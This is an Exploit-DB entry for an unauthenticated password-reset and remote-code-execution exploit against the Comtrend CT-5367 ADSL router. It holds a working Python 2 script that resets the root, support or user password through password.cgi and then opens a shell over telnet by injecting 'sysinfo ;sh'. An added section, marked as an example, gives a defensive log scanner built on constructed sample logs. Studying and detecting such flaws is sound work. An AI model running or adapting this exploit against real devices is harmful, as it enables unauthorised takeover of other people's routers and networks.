exploit-db-mirror/exploits/hardware/remote/43389.py
Offensive Security b91055c9da DB: 2017-12-27
2017-12-27 05:02:31 +00:00

# Exploit Title: Globalnet COMTREND ADSL Router CT-5367 Remote Code Execution
# Date: 11-12-2017
# Exploit Author: TnMch
# Software Link : null
# Type : HardWare
# Risk of use : High
# Type to use : Remote
1. Description
Any unauthenticated user can change the password of every account (root, support, user) and then execute code remotely, without having access to the device.
2. Proof of Concept
Request this page before logging in to the ADSL panel: 192.168.1.1/password.cgi/password.cgi
<form>
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="120">Username:</td>
<td><select name='userName' size="1">
<option value="0">
<option value="1">root <!-- admin -->
<option value="2">support <!-- support -->
<option value="3">user <!-- user -->
</select></td>
</tr>
<tr>
<td>Old Password:</td>
<td><input name='pwdOld' type="password" size="20" maxlength="16"></td>
</tr>
<tr>
<td>New Password:</td>
<td><input name='pwdNew' type="password" size="20" maxlength="16"></td>
</tr>
<tr>
<td>Confirm Password:</td>
<td><input name='pwdCfm' type='password' size="20" maxlength="16"></td>
</tr>
</table>
<br>
<center><input type='button' onClick='btnApply()' value='Save/Apply'></center>
</form>
3. Exploit
#!/usr/bin/env python
# Python 2 script (print statements, raw_input, str.encode('base64')).
import platform
import requests
import base64

base_url = "http://192.168.1.1/"

''' first check default gateway '''
r = requests.get(base_url, allow_redirects=True)
resp = r.content
'''Check resp'''
if 'Authorization' not in resp:
    exit("[-]Invalid host !! ")

''' Change password '''
again = True
while again:
    print "Which User"
    print "(root | support | user )"
    user = raw_input('user : ').split()[0]
    if user not in ("root", "support", "user"):
        exit("[-] No user with this name !! ")
    print "[+] Update password ", user
    password = raw_input('new password : ').split()[0]
    print "[+] Update new password ['", password, "']"
    # Build the request URL from the base each time, so a second pass through
    # the loop does not append onto the previous iteration's URL.
    if user == "root":
        url = base_url + "password.cgi?sysPassword=" + password
    if user == "support":
        url = base_url + "password.cgi?sptPassword=" + password
    if user == "user":
        url = base_url + "password.cgi?usrPassword=" + password
    # The panel echoes the stored password base64-encoded; strip the trailing newline.
    pass_b64 = password.encode('base64').split()[0]
    r2 = requests.get(url, allow_redirects=True)
    resp2 = r2.content
    ''' Check update '''
    if pass_b64 in resp2:
        print "[+] Password for user : ", user, " updated!"
        print "Happy hacking :D, enjoy"
    else:
        print "[-] Something Wrong , please check again! "
    y_n = raw_input('Do you want again? :D (y/n) : ').split()[0]
    if 'n' != y_n and 'y' != y_n:
        exit('bad input :(')
    if y_n == 'n':
        print "Go Go Go :D ,No Time for you Mr.Robot"
        shell_yn = raw_input("Do you want shell? (y/n) :D : ").split()[0]
        if shell_yn != 'n':
            # pwntools is only imported here; 'sys' renamed so it does not shadow the module name.
            os_name = platform.system()
            if os_name == "Windows":
                exit("Sorry only on Linux or Mac Os")
            from pwn import *
            target = "192.168.1.1"
            port = 23
            p = remote(target, port)
            p.recvuntil("Login:")
            p.sendline(user)
            p.recvuntil("Password:")
            p.sendline(password)
            p.sendline("sysinfo ;sh")
            p.interactive()
        again = False
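For defenders reviewing traffic to a router of this kind, the following is an added example (not part of the exploit above or of the original page) that scans HTTP request records for the password-change pattern the script relies on: requests to password.cgi carrying the sysPassword, sptPassword or usrPassword parameter. The log lines, the Common Log Format layout and the assumption that an HTTP proxy or network sensor in front of the device records such requests are all constructed for this example; the router itself is not known to produce logs in this form.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample records in Common Log Format from a hypothetical HTTP
# proxy/sensor in front of the router (not real captures).
SAMPLE_LOG = """\
192.168.1.23 - - [27/Dec/2017:05:02:31 +0000] "GET / HTTP/1.1" 401 312
192.168.1.23 - - [27/Dec/2017:05:02:35 +0000] "GET /password.cgi?sysPassword=hunter2 HTTP/1.1" 200 1543
192.168.1.23 - - [27/Dec/2017:05:02:40 +0000] "GET /password.cgi?sptPassword=abc123 HTTP/1.1" 200 1543
192.168.1.50 - admin [27/Dec/2017:06:10:02 +0000] "GET /password.cgi?usrPassword=newpass HTTP/1.1" 200 1543
192.168.1.50 - admin [27/Dec/2017:06:11:00 +0000] "GET /wancfg.cmd HTTP/1.1" 200 990
"""

# Query parameters used by the exploit, mapped to the account each one changes.
PASSWORD_PARAMS = {
    "sysPassword": "root",
    "sptPassword": "support",
    "usrPassword": "user",
}

# Common Log Format: client, identity, authenticated user, timestamp, request, status, size.
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+$'
)


def parse_clf(line):
    """Parse one CLF line into a dict, or return None if it does not match."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None


def find_password_changes(log_text):
    """Return one finding per request that hits password.cgi with a password-setting
    parameter. The password value is deliberately not copied into the finding: it
    travels in the clear in the query string and should not be spread into alerts."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_clf(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        if not parts.path.endswith("password.cgi"):
            continue
        params = parse_qs(parts.query)
        for name, account in PASSWORD_PARAMS.items():
            if name in params:
                findings.append({
                    "ip": rec["ip"],
                    "ts": rec["ts"],
                    "account": account,
                    # CLF records an identity only when the request carried HTTP auth;
                    # "-" means the change was made with no login at all.
                    "authenticated": rec["user"] != "-",
                    "status": int(rec["status"]),
                })
    return findings


def count_unauthenticated(findings):
    """Number of password changes made without any authenticated identity."""
    return sum(1 for f in findings if not f["authenticated"])


if __name__ == "__main__":
    results = find_password_changes(SAMPLE_LOG)
    for f in results:
        flag = "ALERT" if not f["authenticated"] else "info "
        print(f"{flag} {f['ts']} {f['ip']} set password for '{f['account']}' (HTTP {f['status']})")
    print(f"{count_unauthenticated(results)} unauthenticated password change(s)")
```

Because the page's point is that password.cgi answers before any login, every hit on it from a client with no recorded identity is the signal worth alerting on; the one authenticated change in the sample is reported at a lower level for audit. The same records also show why the management interface and the telnet service the script connects to afterwards should not be reachable from untrusted networks.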